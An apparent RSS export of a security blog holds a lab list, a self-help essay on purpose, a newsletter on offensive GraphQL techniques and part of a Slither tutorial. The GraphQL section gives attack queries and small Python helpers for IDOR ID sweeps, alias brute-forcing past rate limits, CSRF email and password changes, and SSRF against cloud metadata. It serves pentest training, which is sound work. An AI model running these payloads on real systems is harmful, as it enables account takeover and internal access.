    Things start to heat up here. You’ll face challenges involving AS-REP Roasting and ticket handling under a realistic domain setup.
-   [**Escape**](https://www.hackthebox.com/machines/escape)  
    A nice mix of enumeration, ticket extraction, and lateral movement. You’ll need to connect the dots across several services.
-   [**Scrambled**](https://www.hackthebox.com/machines/scrambled)  
    Focuses more on authentication edge cases. You’ll explore service tickets and creative ways to escalate access.

* * *

### 🔴 **Advanced**

-   [**Absolute**](https://www.hackthebox.com/machines/absolute)  
    Not for the faint-hearted. Involves smart Kerberos abuse, privilege escalation, and post-exploitation tactics across multiple systems.
-   [**Flight**](https://www.hackthebox.com/machines/flight)  
    You’ll dive into TGT manipulation and tricky SPN-based attacks. A real test of your Kerberos fundamentals.
-   [**Sekhmet**](https://www.hackthebox.com/machines/sekhmet)  
    Expect deep AD integration, advanced ticket abuse, and clever paths that require lateral thinking and solid recon.
-   [**Hathor**](https://www.hackthebox.com/machines/hathor)  
    One of those boxes that really pushes your understanding of trust relationships and ticket management in Kerberos.
-   [**Anubis**](https://www.hackthebox.com/machines/anubis)  
    A deep dive into ticket reuse and delegation abuse. A great lab if you’re prepping for real-world red team ops.
-   [**Tentacle**](https://www.hackthebox.com/machines/tentacle)  
    Layers of service-based access with subtle Kerberos tricks along the way. You’ll need to think strategically to break through.
-   [**Mantis**](https://www.hackthebox.com/machines/mantis)  
    Complex and multi-layered. Kerberos plays a central role, but it’s mixed with heavy AD and infrastructure exploitation.

**Your own lab:** Set up a Windows Domain Controller, a few clients, and test safely with detection turned off. I’ve created a [series of posts](https://www.kayssel.com/series/offensive-lab/) talking about this topic.</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>The Viking’s Question: What Are You Really Fighting For?</title><link>https://www.kayssel.com/post/mentaility-1</link><guid isPermaLink="true">https://www.kayssel.com/post/mentaility-1</guid><description>A purpose isn&apos;t something you wait for. It&apos;s something you build. Through discipline, reflection, and action, you can design a life worth living. In this article, we explore what it means to walk with purpose in a world full of noise and distraction.</description><pubDate>Sun, 20 Apr 2025 08:49:52 GMT</pubDate><content:encoded># Prologue - Why Am I Doing This?

He was born to fight.  
He learned how to wield a sword like no one else, how to row faster than the wind, and how to conquer cities like a true leader.  
He achieved glory like no Viking before him.  
He did all these things because that’s what Vikings were meant to do. It was the way of the Viking.

But one day, in the middle of battle, after having slain thousands, he realized that none of it made sense anymore.  
_Why am I doing all of this? I have everything, yet I feel so empty all the time. Why?_

Lost in that thought, he was defeated by his enemy and taken as a slave.  
During that time of suffering, witnessing the horrors of war up close, making his first real friends only to lose them again, he came to a different truth.

What he truly wanted wasn’t more battles.  
What he truly longed for was freedom. To escape war, to break the cycle.

With no more enemies left to fight, he chose to fight for something greater than himself:  
A real purpose. A place of peace. A land he would call **Free Land**.

At first, he believed that Free Land was a destination. But what he really found was something deeper. A new direction.  
He didn’t know if he would ever reach that land. And maybe it didn’t even matter.  
What mattered was that he had stopped living by others’ expectations, and started walking a path he truly believed in.

That was his new fight.  
And that’s the beginning of purpose.

# **What purpose is and why we need it**

Purpose sounds cool, doesn’t it? But what does it actually mean, and do we really need it?

Purpose isn’t some mystical or abstract idea. It’s simply having a direction in life, something worth fighting for, something that gives your actions meaning.

Most of us live on autopilot. We work, follow routines, and chase goals that society has told us are “good,” without ever stopping to ask why. Just like the Viking in our prologue, we often do things simply because that’s what’s expected of us. He fought because that’s what Vikings were supposed to do. That’s what his world told him had value.

Have you ever stopped to ask yourself why you&apos;re doing the things you do each day?

Waking up tired, working without meaning, scrolling endlessly, and wondering at night, “Is this it?”

But after pain, loss, and reflection, the Viking realized what he truly wanted wasn’t war. It was peace. And that’s the turning point many of us face. We wake up one day and realize we’ve been living someone else’s version of a meaningful life.

We must take control. We must fight to define our own version of what matters. When you know what you stand for, it becomes harder to drift away from your path.

Viktor Frankl, a psychiatrist and Holocaust survivor, wrote about this in his book [_Man’s Search for Meaning_](https://www.amazon.es/Mans-Search-Meaning-classic-Holocaust/dp/1846041244). He argued that our deepest drive as human beings isn’t pleasure, as [Freud claimed](https://www.wikiwand.com/en/articles/Pleasure_principle_\(psychology\)), but meaning. This idea became the foundation of what he called [logotherapy](https://www.wikiwand.com/en/articles/Logotherapy), from the Greek word _logos_, meaning “meaning” or “purpose”.

Frankl believed that if a person has a clear “why”, they can endure almost any “how”. And I couldn’t agree more.

Today, many people feel lost. They’re successful on paper but empty inside. They don’t know why they’re doing what they’re doing. They’re suffering from a quiet identity crisis. I know, because I’ve been there, and honestly, I still go through it sometimes.

Most of my friends today are chasing money or fame, thinking that it’s the only way to be “happy” and “free”. And honestly, that’s what most people seem to be looking for. I’ve thought a lot about this, and because of [hedonic adaptation](https://www.wikiwand.com/en/articles/Hedonic_treadmill), the way we quickly get used to what we achieve, even if they do make it, they’ll probably feel happy and free for a few years… and then the emptiness will return.

So, what’s the solution? I believe it’s to find a true purpose, something bigger than ourselves, something to fight for throughout our lives. And that’s not something we stumble upon by chance or inertia. It’s something we build, intentionally, from the beginning.

If you’ve ever felt like that, lost, unmotivated, like something’s missing, you’re not alone. That’s exactly why I started digging into this.

That’s why I wrote this. I’ve been researching this topic for a while, and I want to share some of the ideas, tools, and perspectives that have helped me. I hope they help you too.

# Create purpose vs wait to discover it

Let’s demystify the idea of “waiting for your purpose to appear.”  
Purpose isn’t something you find by thinking. It’s something you build by doing.  
Sometimes, mastering something over time can create the passion and clarity you were missing.

So, we know that we need a purpose in life.  
But maybe you&apos;re thinking: &quot;Ruben, I’ve been waiting for it since I was a kid, and I still don’t know what to do.&quot;  
You’ve probably tried different activities, hoping to find something that makes you feel good, something you enjoy and feel naturally good at.  
But now you&apos;re 30, and you’re still unsure.

Do these thoughts sound familiar?

In my case, I’ve often felt like I wasn’t good at anything.  
As a kid, I wasn’t particularly good at sports or school, or anything specific at all.  
Sure, I liked video games, fantasy books, anime, and series, but those are entertainment.  
They’re designed to be liked by everyone. So, I felt lost.  
People kept saying things like: &quot;Keep searching, Ruben, you’ll find it.&quot;  
And in many books, that’s also the advice: &quot;Find your passion, and you’ll succeed.&quot;  
But I’ve never found that perfect thing everyone talks about.

Maybe I’m still young, but that has been my experience for years.

So what can we do instead, if you, the reader, are in the same position?

We can create something that’s actually under our control.

A powerful Stoic tool called the **dichotomy of control** has helped me a lot.  
The idea is simple: focus on what you can control, and let go of what you can&apos;t.  
And your purpose is one of those things you can control.  
You can choose what you want to stand for, what you want to fight for.  
You can become the architect of your own life.

Now, maybe you’re thinking: &quot;Alright Ruben, sounds good… but what if I design a purpose, and later I realize I don’t like it?&quot;

That’s okay. Your first purpose isn’t your final purpose.  
It’s a starting point. A direction. Something you can adjust as you go.  
The important thing is: you’re taking action.

Most people wait until they feel ready or discover the right thing.  
But purpose rarely works that way.  
As Stanford psychologist William Damon explains, purpose isn’t something we passively discover, but something that grows through engagement and reflection.

Along the same lines, author and professor Cal Newport argues that passion often follows mastery, not the other way around.  
You don’t need to love something before you begin. Commitment and effort are what create the love over time.

And as philosopher Jean-Paul Sartre famously said, &quot;Man is nothing else but what he makes of himself.&quot;  
You’re not born with a purpose. You have to choose it, and then fight for it.

Let’s say you want to become the best developer in the world, but at first, you’re bad at solving problems, and you feel like you don’t even like it.  
Still, you fight for it because you chose it. You decided that’s the life you want.

What you need is to strengthen your discipline muscle and fight every single day.  
I promise you, after 10 years of showing up and improving, you’ll be amazing at solving problems.  
And people will say: &quot;Of course it’s easy for you, you’re so talented...&quot;  
But what they won’t see is the discipline, the effort, and the purpose that you built from scratch.

# The trap of false freedom without direction

In the first section of this article, I mentioned how many people see becoming rich as the ultimate goal, not just for the money itself, but for the freedom they believe it brings.  
But here&apos;s the danger: that kind of _“freedom”_ can easily turn into a trap. You end up becoming a slave to your own mind. Let me explain.

Imagine you could do whatever you wanted. You could buy a new car every week, a house every month, or date anyone you want. You&apos;re rich, so you’re _&quot;free&quot;_, right?

But without a clear direction, that freedom becomes meaningless.

And this is the trap:  
**Lack of commitment is not the same as freedom.**

Freedom without purpose is just drifting. Sooner or later, it leads to:

-   Feeling like you&apos;re not moving forward
-   A lack of personal growth
-   Emptiness or constant anxiety
-   Jumping from one thing to another without meaning (jobs, relationships, hobbies)

The only real freedom is the one that comes from within.  
It’s the freedom to choose your path and stay on it.  
That’s why you need a purpose. A direction. A reason behind your decisions.

Philosopher **Jean-Paul Sartre** said it clearly:

&gt; _&quot;Man is condemned to be free.&quot;_

This means we are always responsible for what we do with that freedom.  
If you don’t choose your own path, someone or something else will choose it for you: society, trends, fear, comfort.

**Viktor Frankl**, who survived the horrors of a concentration camp, wrote:

&gt; _&quot;When a person can&apos;t find a deep sense of meaning, they distract themselves with pleasure.&quot;_

And that’s what many people do today. We binge content, scroll endlessly, chase dopamine, but never stop to ask ourselves _why_.

Even earlier, **Søren Kierkegaard** warned about the _“dizziness of freedom”_: the anxiety that comes from having too many options without knowing which one to choose.  
Freedom, without commitment to something greater, becomes a source of existential paralysis.

**So what&apos;s the solution?**

The only way to feel truly free is to commit to a purpose that is meaningful to you.  
And to stay on that path, you don’t need motivation.  
You need **discipline,** the ability to act in line with your values even when it’s hard.

**That’s real freedom:** choosing what matters, and living by it.

# **Designing Your Purpose (Not Waiting for It)**

Now that we understand how important purpose is, the next step is simple in theory, but challenging in practice: we need to **create** it.

In my case, the first thing that helped me the most was **reflection**. Taking time to understand myself. Asking the right questions. Being brutally honest. Below is a list of powerful questions that I’ve answered over the years, and that helped me get some clarity.

They are adapted from the blog [_Fitness Revolucionario_](https://www.fitnessrevolucionario.com/2021/10/01/proposito-y-salud/), one of my favorite blogs of all time:

-   What things did you enjoy most as a child? What could you do for hours without getting tired?
-   What makes you feel truly happy? How could you help others feel the same?
-   What worries you about the world?
-   What problems do you think future generations will face?
-   What motivates you? What gives you energy?
-   What makes you angry? This may sound negative, but it often points to something you deeply care about.
-   What are you good at? What talents do you have?
-   What do people admire about you? If you don’t know, ask five friends.
-   What are you most proud of in your life?
-   What kind of books, blogs, or magazines do you read for pleasure? What sections do you go to first in a bookstore?
-   Who are your heroes? Who do you admire, and why?
-   Imagine you win 100 million euros. After paying your debts and traveling, how would your life change? What would you do then?
-   What ideas do you defend in discussions, even when most people disagree with you?
-   What do you love sharing with others?
-   How would you like your life to be in 5 or 10 years?
-   Imagine yourself at 90, on your last day. What would you regret? How would you like to be remembered?

Now, after going through these questions, you probably understand yourself a bit better. And here’s something cool: thanks to technology, you can feed your answers into tools like ChatGPT and ask for ideas, patterns, and feedback. This can be incredibly useful to reflect deeper and explore new possibilities. Ask anything. Even if you don’t find your purpose immediately, I’m sure you’ll discover something that resonates with you, a starting point. The first step toward your _ikigai_.

From here on, reflection should become a habit. One thing that helps me is keeping a **journal**. I use it to capture my thoughts, track changes, and make sense of what I’m feeling.  
Write about your _ikigai_, the direction it’s taking, and the decisions you’re making to move toward it.

This idea of **designing your life**, instead of waiting passively, is powerful.  
And you can apply it to more than just your purpose: to health, mindset, relationships, creativity, anything.

One concept I really love is **eudaimonia**. It comes from Ancient Greek philosophy and was central to thinkers like Aristotle and the Stoics. It’s often translated as _flourishing_ or _living well_: becoming your best self. Not by comparing yourself to others, but by living in alignment with your values. By **earning your own applause**.

You are the director of your own life. So be intentional. Be creative.  
And fight for the future you want to build.

# **Purpose as a Path, Not a Trophy**

One of the most important things to understand is that your purpose is not a destination. You might reach it, or you might not, and that’s okay. What truly matters is trying to live according to what you’ve designed for yourself. That is where real freedom begins. Instead of chasing a result, focus on the process of becoming. Focus on who you are while pursuing something that matters. Living with purpose is about direction, not perfection.

This mindset removes pressure. You don’t need to arrive anywhere specific. You just have to walk the path and stay on it. To make this sustainable, it’s essential to enjoy the journey, to fall in love with the process of growth. Psychologist Mihaly Csikszentmihalyi called this state &quot;flow&quot;, a mental space where you are fully immersed, focused, and energized by what you’re doing. Flow appears when challenge meets skill, when progress becomes deeply satisfying.

To enter this state more often, your systems matter. Your habits shape your identity. James Clear explains this beautifully in _Atomic Habits_, one of the most useful books I’ve read. His core idea is simple: small consistent actions create massive long-term impact. So if you want to grow, design your day around habits that reflect your values and your vision. For example, maybe you commit to one hour of cybersecurity, one hour of sport, and one hour of mindset work every day. These three hours, done consistently, will transform your life over time. Even if you have to work, clean, shop or take care of responsibilities, these core habits act as anchors. You don’t need perfection, just consistency.

That said, discipline doesn’t mean punishment. It’s also important to give yourself moments of rest and joy. After finishing your focused blocks, reward yourself with something that makes you feel good. Read, play games, watch an episode of a show you love. And even during the work itself, find ways to make it pleasant, maybe study while listening to music, or sip your favorite coffee while journaling. Some days won’t feel amazing. But you still show up. Because over time, even if you didn’t love the work at first, you’ll come to enjoy it. That’s what mastery does. It creates joy.

Modern Stoic thinkers like Marcos Vázquez emphasize this too. Living with intention doesn’t mean suffering nonstop. It means aligning your effort with something meaningful, building strength and enjoying the process of becoming stronger. In Buddhist philosophy, there’s a similar idea: act with presence, give your best, but let go of attachment to the outcome. When you stop obsessing over the final result, you can start enjoying the act itself. That’s when things shift.

Purpose is not something you win. It’s something you walk. And the longer you stay on the path, the more you begin to love the rhythm, not just the destination.

# **The AI Era, Human Purpose, and Evolution**

Before closing this article, I want to reflect on something that has been on my mind a lot lately: the rise of AI and how it affects our sense of purpose.

Many people are asking themselves things like, _“Why should I start learning this if AI will soon do it better than me?”_ And to be honest, I’ve asked myself the same question.

For example, I’ve spent countless hours learning how to automate tasks using Python or Bash. Years ago, this was an incredibly valuable skill. It helped me pass certifications like the OSCP and made me efficient in my work. Today, it’s still useful, but the truth is that AI can already generate similar scripts much faster than I can. And in the near future, it might even do it better.

So what does that mean? Should I give up? Should I feel useless?

Not at all.

Because there will always be things we cannot control. Maybe AI will eventually perform penetration tests on its own. Or maybe it will simply remain a powerful tool that helps us work better. We don’t know for sure.

What I’ve realized is this: our purpose is not something fixed. It’s a direction we follow during a certain phase of our life. And just like we evolve, our purpose can evolve too.

If one of your goals suddenly becomes obsolete or less meaningful, you can reshape it. You can adapt. You can choose a new purpose, a new version of yourself, a new challenge. You’re not locked in.

Purpose isn’t a static label. It’s a living intention that adjusts with time, with experience, and with context.

Today it’s AI. In the past, it was the industrial revolution. Every major shift in history has forced us to rethink who we are and what we want to do. But we humans have always found new paths to walk, new ways to grow, new dreams to pursue.

And that’s what makes purpose so powerful. It’s not about having one perfect mission forever.  
It’s about being intentional, again and again, no matter what changes around you.

You are the one who chooses how to respond. You are still the architect of your life.

# Conclusions

With this article, I’ve written something a bit different from what I usually share.  
But I truly believe that having the right mindset is essential. Not just in cybersecurity, but in life. That’s why I decided to publish this.

If you’ve made it this far, I really hope you found something useful, some idea that made you reflect or gave you clarity.

Now you understand why having a purpose, or at least a direction, matters so much.  
Purpose isn’t a gift you receive. It’s a path you decide to walk.  
You don’t need to have everything figured out from the beginning. You just need to take the first step and keep walking.

Your purpose doesn’t have to be perfect. It can evolve. It can adapt.  
What truly matters is living with intention and choosing to grow, even when things around you change.

Just like the Viking at the beginning of this story, you don’t need to fight for what others expect from you.  
You can stop following a script written by someone else.  
You can choose your own reason to fight: your own Free Land.

If you were waiting for a sign, this is it.  
Start building your path.  
Start designing your life.  
And above all, keep walking with purpose.

Because in the end, it’s not just about where you go.  
It’s about leaving a path that others might want to follow.

As Marcus Aurelius once wrote:  
**&quot;Don’t waste what remains of your life in speculating about others… Instead, be intentional in everything you do.&quot;**

Live with purpose. Build something worth remembering.  
And make it yours.

# References

Vázquez, M. _Fitness Revolucionario (Blog)._  
Available at: [https://www.fitnessrevolucionario.com](https://www.fitnessrevolucionario.com/)

Vázquez, M. _Invincible: Achieve More, Suffer Less._ Planeta Publishing, 2020.  
Available at: [http://fitnessrevolucionario.com/programas/invicto/](http://fitnessrevolucionario.com/programas/invicto/)

Frankl, V. E. _Man’s Search for Meaning._ Beacon Press, 2006.  
Available at: [https://www.goodreads.com/book/show/4069.Man\_s\_Search\_for\_Meaning](https://www.goodreads.com/book/show/4069.Man_s_Search_for_Meaning)

Sartre, J.-P. _Existentialism Is a Humanism._ Yale University Press, 2007.  
Available at: [https://yalebooks.yale.edu/book/9780300115468/existentialism-is-a-humanism/](https://yalebooks.yale.edu/book/9780300115468/existentialism-is-a-humanism/)

Kierkegaard, S. _The Concept of Anxiety._ Princeton University Press, 1980.  
Available at: [https://www.amazon.com/Concept-Anxiety-Psychologically-Deliberation-Kierkegaards/dp/0691020116](https://www.amazon.com/Concept-Anxiety-Psychologically-Deliberation-Kierkegaards/dp/0691020116)

Csikszentmihalyi, M. _Flow: The Psychology of Optimal Experience._ Harper Perennial, 2008.  
Available at: [https://www.goodreads.com/book/show/66354.Flow](https://www.goodreads.com/book/show/66354.Flow)

Clear, J. _Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones._ Avery, 2018.  
Available at: [https://jamesclear.com/atomic-habits](https://jamesclear.com/atomic-habits)

Damon, W. _The Path to Purpose: Helping Our Children Find Their Calling in Life._ Free Press, 2008.  
Available at: [https://www.goodreads.com/book/show/1393795.The\_Path\_to\_Purpose](https://www.goodreads.com/book/show/1393795.The_Path_to_Purpose)

Newport, C. _So Good They Can’t Ignore You: Why Skills Trump Passion in the Quest for Work You Love._ Grand Central Publishing, 2012.  
Available at: [https://calnewport.com/writing/#books](https://calnewport.com/writing/#books)

Aurelius, M. _Meditations._ Translated by Gregory Hays, Modern Library, 2003.  
Available at: [https://www.goodreads.com/book/show/30659.Meditations](https://www.goodreads.com/book/show/30659.Meditations)</content:encoded><author>Ruben Santos</author></item><item><title>First Issue – Let’s Go</title><link>https://www.kayssel.com/newsletter/issue-1</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-1</guid><description>First Newsletter!</description><pubDate>Sun, 20 Apr 2025 08:32:00 GMT</pubDate><content:encoded>Welcome to my first newsletter!

The purpose of this is simple:  
To have a direct channel where I can share my thoughts, keep you updated when a new blog post drops, and deliver offensive security techniques I’ve learned during the week.

This isn’t about theory or abstract ideas.  
It’s about giving you real, actionable tactics you can recognize and apply when you face real targets.

Because at the end of the day, one of the most powerful ways to improve in offensive security, whether you&apos;re studying for a cert like the OSCP or working in the field, is by building mental muscle memory.

The more techniques you archive in your mind (or in a structured place like Obsidian or GitBook), the faster you&apos;ll be able to recognize patterns during an audit and know exactly what to try.

If you&apos;re serious about growing in this field, you should be building your own version of HackTricks: a personal methodology, refined over time.

# Offensive GraphQL Techniques You Should Know

We&apos;re starting with GraphQL.  
This is part of a [broader API hacking series](https://www.kayssel.com/series/hacking-apis/) I’m working on, and this drop summarizes key attack vectors you can add to your methodology right away.

## Discovering GraphQL Endpoints

To confirm that a URL is exposing a GraphQL endpoint, send this simple query:

```graphql
query { __typename }
```

&lt;details&gt;
&lt;summary&gt;If the response includes:&lt;/summary&gt;

```json
{ &quot;data&quot;: { &quot;__typename&quot;: &quot;query&quot; } }
```
&lt;/details&gt;


Then you’ve found a GraphQL endpoint.

Try common paths:

-   `/graphql`
-   `/api/graphql`
-   `/graphql/api`
-   `/graphql/graphql`
-   `/v1/graphql`

Tools like Burp Scanner or [Graphw00f](https://github.com/dolevf/graphw00f) can automate this discovery.
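The path check can also be scripted by hand. Here is a minimal Python sketch that builds one `__typename` probe per candidate path; the base URL is a placeholder, and each body is meant to be sent as a JSON `POST` with whatever HTTP client you prefer:

```python
import json

# Candidate paths from the list above
COMMON_PATHS = ["/graphql", "/api/graphql", "/graphql/api", "/graphql/graphql", "/v1/graphql"]

def build_probe(base_url, path):
    """Return (url, body) for a __typename probe against one candidate path."""
    body = json.dumps({"query": "query { __typename }"})
    return base_url.rstrip("/") + path, body

probes = [build_probe("https://target.example", p) for p in COMMON_PATHS]
```

A response whose `data.__typename` field is populated confirms a GraphQL endpoint at that path.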

## Introspecting the Schema

If introspection is enabled, you can reveal the full structure of the API.

&lt;details&gt;
&lt;summary&gt;Basic probe:&lt;/summary&gt;

```graphql
query {
  __schema {
    queryType { name }
  }
}
```
&lt;/details&gt;


Use full introspection queries with tools like [GraphQL Voyager](https://github.com/APIs-guru/graphql-voyager) to visualize relationships between types, queries, and mutations. If introspection is disabled, check the next technique.

## Discovering Schema Without Introspection

Even when introspection is disabled, GraphQL frameworks like Apollo may leak schema hints via error messages.

&lt;details&gt;
&lt;summary&gt;Try sending typos like:&lt;/summary&gt;

```graphql
query { getUsre }
```
&lt;/details&gt;


Apollo might respond with:

&gt; Did you mean &quot;getUser&quot;?

Tools like [Clairvoyance](https://github.com/nikitastupin/clairvoyance) automate this kind of discovery.
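If you want to generate these probes yourself, a simple adjacent-character-swap generator is enough to start. This is an illustrative sketch, not how Clairvoyance works internally:

```python
def typo_variants(field):
    """Adjacent-character swaps of a guessed field name, each likely to
    trigger an Apollo 'Did you mean ...?' suggestion."""
    swaps = []
    for i in range(len(field) - 1):
        swaps.append(field[:i] + field[i + 1] + field[i] + field[i + 2:])
    return swaps

print(typo_variants("getUser"))  # includes "getUsre", the probe shown above
```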

## Exploiting Unsanitized Arguments (IDOR)

APIs that expose resources directly via user-controlled arguments may be vulnerable to Insecure Direct Object References.

&lt;details&gt;
&lt;summary&gt;For example:&lt;/summary&gt;

```graphql
query {
  getUserById(id: &quot;1234&quot;)
}
```
&lt;/details&gt;


If there’s no access control check, changing the ID may leak sensitive data from other users.
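Sweeping a range of IDs is easy to script. A sketch using the hypothetical `getUserById` field and `id` argument from the example (substitute the real names you find):

```python
def idor_sweep(start, count):
    """Build one query per candidate numeric ID."""
    return [f'query {{ getUserById(id: "{i}") }}' for i in range(start, start + count)]

queries = idor_sweep(1230, 5)  # probes IDs 1230 through 1234
```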

## Bypassing Rate Limiting Using Aliases

Aliases let you request the same field multiple times in a single HTTP request, bypassing naive rate-limiting protections.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```graphql
query {
  d1: isValidDiscount(code: &quot;AAA&quot;)
  d2: isValidDiscount(code: &quot;BBB&quot;)
  d3: isValidDiscount(code: &quot;CCC&quot;)
}
```
&lt;/details&gt;


This allows you to brute-force or scan multiple entries in one request, avoiding WAF or IP-based limits.
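Writing aliased queries by hand gets tedious fast, so it is worth generating them. A minimal sketch, where the field and argument names mirror the hypothetical discount example above:

```python
def alias_batch(field, arg, values):
    """Pack one aliased call per candidate value into a single query."""
    lines = [f'  d{i}: {field}({arg}: "{v}")' for i, v in enumerate(values)]
    return "query {\n" + "\n".join(lines) + "\n}"

print(alias_batch("isValidDiscount", "code", ["AAA", "BBB", "CCC"]))
```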

## Finding CSRF Vulnerabilities in GraphQL

Some GraphQL APIs accept `GET` requests, or `POST` requests with non-JSON content types (e.g., `application/x-www-form-urlencoded`), making them vulnerable to CSRF.

To test this, try a simple `GET` request with the query in the URL:

```http
GET /graphql?query=mutation+{changeEmail(newEmail:&quot;attacker@example.com&quot;)} HTTP/1.1
```

Then send a `POST` request with `Content-Type: application/x-www-form-urlencoded`:

```http
POST /graphql HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=mutation+{updatePassword(newPassword:&quot;123456&quot;)}
```

If either request goes through and performs the mutation, you&apos;ve got a CSRF vector.

Secure GraphQL implementations should:

-   Only accept `application/json`
-   Enforce CSRF tokens
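To see exactly what a cross-site auto-submitting form would send, you can reproduce the form-encoded body. A sketch, reusing the hypothetical password-change mutation from above:

```python
from urllib.parse import urlencode

def csrf_form_body(mutation):
    """Body an auto-submitting HTML form would send, assuming the endpoint
    accepts application/x-www-form-urlencoded instead of JSON only."""
    return urlencode({"query": mutation})

print(csrf_form_body('mutation {updatePassword(newPassword:"123456")}'))
```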

## SSRF via GraphQL Mutations

Some mutations take URLs as arguments and pass them to backend logic. If there’s no input validation, you may be able to perform Server-Side Request Forgery.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```graphql
mutation {
  updatePlant(sourceURL: &quot;http://127.0.0.1:8888&quot;)
}
```
&lt;/details&gt;


This could let you scan internal services or hit cloud metadata endpoints. In vulnerable setups, it can lead to privilege escalation.
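Generating payloads for the usual internal targets is straightforward. A sketch, where the mutation and argument names come from the hypothetical example above and the second URL is the standard cloud instance-metadata link-local address:

```python
def ssrf_payload(url):
    """Wrap a target URL in the (hypothetical) vulnerable mutation."""
    return f'mutation {{ updatePlant(sourceURL: "{url}") }}'

internal_targets = [
    "http://127.0.0.1:8888",                      # local service from the example
    "http://169.254.169.254/latest/meta-data/",   # cloud instance metadata
]
payloads = [ssrf_payload(t) for t in internal_targets]
```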

## Where to Practice

You can practice these techniques in realistic labs and machines. Here are a few resources:

-   [PortSwigger Web Security Academy – GraphQL Labs](https://portswigger.net/web-security/graphql)
-   [Damn Vulnerable GraphQL Application](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)

And these retired Hack The Box machines:

-   [Overgraph (06 Aug 2022)](https://app.hackthebox.com/machines/Overgraph)
-   [Cereal (29 May 2021)](https://app.hackthebox.com/machines/Cereal)
-   [Help (08 Jun 2019)](https://app.hackthebox.com/machines/Help)

* * *

## New Article!

This week’s article is a bit different from the usual technical drops.

It’s about purpose. Why it matters. How to think about it. How to design your own.

To be honest, writing it made me feel a bit vulnerable. I&apos;m not an expert in philosophy or personal development, and I even hesitated to publish it. But I believe it’s an important topic, and maybe it will help someone who feels a bit lost or disconnected right now.

If you&apos;re in that place, or just want to reflect deeper on where you&apos;re headed, it might resonate with you.

[Read the first article here](https://www.kayssel.com/post/mentaility-1/)

Let me know your thoughts if you read it. I’d love to hear your feedback.

[Subscribe now](%%checkout_url%%)</content:encoded><category>Newsletter</category><category>web-security</category><category>api-security</category><author>Ruben Santos</author></item><item><title>Slither: Your First Line of Defense in Smart Contract Security</title><link>https://www.kayssel.com/post/web3-17</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-17</guid><description>Slither: A powerful static analysis tool that scans smart contracts for vulnerabilities, maps attack surfaces, and visualizes code relationships—essential for efficient security auditing and penetration testing of blockchain applications.</description><pubDate>Sun, 06 Apr 2025 09:58:37 GMT</pubDate><content:encoded># Introduction

Welcome back to my Web3 security series! If you&apos;ve stuck around all the way to entry **#17**, you deserve a virtual high-five — either you&apos;re genuinely fascinated by smart contract auditing, or you&apos;ve invested too many hours to bail now. Either way, I&apos;m glad you&apos;re here!

By this point, you&apos;ve probably encountered more `require()` statements than actual humans this week. Your dreams might feature reentrancy attacks, your lunch breaks are spent pondering frontrunning vulnerabilities, and you may have caught yourself whispering &quot;msg.sender&quot; in quiet moments. Don&apos;t worry—we&apos;re all a little weird here in security-land.

Today, I&apos;m excited to introduce you to a tool that&apos;s saved my sanity countless times: [**Slither**.](https://github.com/crytic/slither) No, it&apos;s not a reptile (though it does sniff out dangerous code-creatures with impressive accuracy). Developed by the brilliant minds at Trail of Bits, Slither is essentially a security scanner with superpowers—open source, extensively tested, and considerably less sweaty than actual steroids.

In this post, I&apos;ll walk you through:

-   What makes Slither tick under the hood (explained in human language, I promise)
-   Why virtually every security professional I know keeps it in their toolbox
-   How you can start using it today to catch bugs before they catch you

We&apos;ll even roll up our sleeves with a practical example—because while theory is nice, watching Slither flag a potential exploit in real-time is downright satisfying.

So grab your favorite caffeinated beverage, make sure your terminal is ready, and let&apos;s get slithering into the world of automated smart contract analysis! 🐍

# What is Slither?

For those of us in the security trenches, hunting vulnerabilities across smart contracts day after day, Slither is essentially our reconnaissance tool of choice.

At its core, Slither is a static analysis framework that gives penetration testers and security auditors an immediate advantage when approaching a new smart contract codebase. Unlike many tools that simply generate noise, Slither provides actionable intelligence about the attack surface you&apos;re dealing with.

When I&apos;m approaching a new audit engagement with limited time (and let&apos;s be honest, when aren&apos;t we on a tight deadline?), Slither gives me that critical first look at what I&apos;m dealing with. It&apos;s like having satellite imagery before entering unfamiliar territory.

What makes Slither indispensable for security professionals:

-   **It maps the attack surface** by identifying externally accessible functions, public state variables, and potential entry points for exploitation
-   **It flags high-value targets** like privileged functions, self-destruct mechanisms, and direct ETH transfers that warrant immediate attention
-   **It traces execution paths** through complex contract interactions, helping spot vulnerable flows that might otherwise take days to identify manually
-   **It detects common vulnerability patterns** that experienced attackers will immediately target in production

I&apos;ve lost count of how many times Slither has revealed critical vulnerability paths that weren&apos;t immediately apparent from manual code review. Those subtle cross-contract interactions or state modifications after external calls that represent perfect exploitation opportunities? Slither excels at bringing these to light.

What particularly separates Slither from other security tools is its remarkably low false-positive rate. When Slither flags something as potentially dangerous, it&apos;s almost always worth investigating. This precision is invaluable when you&apos;re operating under audit time constraints and need to prioritize your efforts effectively.

Even for seasoned security professionals, Slither serves as an excellent starting point to orient yourself within complex systems. Rather than spending hours manually tracing inheritance hierarchies or mapping dependency structures, Slither gives you that information upfront, allowing you to focus your expertise on finding the non-obvious vulnerabilities that automated tools might miss.

In my pentesting toolkit, Slither is typically the first weapon I deploy – it helps me understand what I&apos;m up against before I start crafting more targeted exploits.

# How Does Slither Work?

Understanding how Slither analyzes smart contracts gives us a strategic advantage. Rather than just accepting its findings blindly, knowing its inner workings helps us leverage the tool more effectively and understand where to dig deeper.

At a high level, Slither operates like an advanced reconnaissance system for smart contract battlefields. Let me walk you through what&apos;s happening under the hood when you point it at a codebase.

### **Phase 1: Building Intelligence Through Parsing**

First, Slither uses the Solidity compiler frontend to generate an **Abstract Syntax Tree (AST)** of the target contract. This is essentially a structured representation of the code that makes it possible to analyze programmatically.

This initial parsing phase is critical because it extracts key tactical information:

-   The complete **inheritance hierarchy** - crucial for understanding privilege escalation vectors
-   **Control flow graphs** for every function - revealing all possible execution paths an attacker might follow
-   **Variable scopes and definitions** - identifying potential storage collision attacks

What makes this parsing phase powerful is that Slither doesn&apos;t just capture individual contract elements in isolation - it builds a comprehensive map of how everything interconnects.

### **Phase 2: Transforming into SlithIR for Deeper Analysis**

The most powerful aspect of Slither comes next: it converts the parsed code into **SlithIR**, an intermediate representation specifically designed for security analysis.

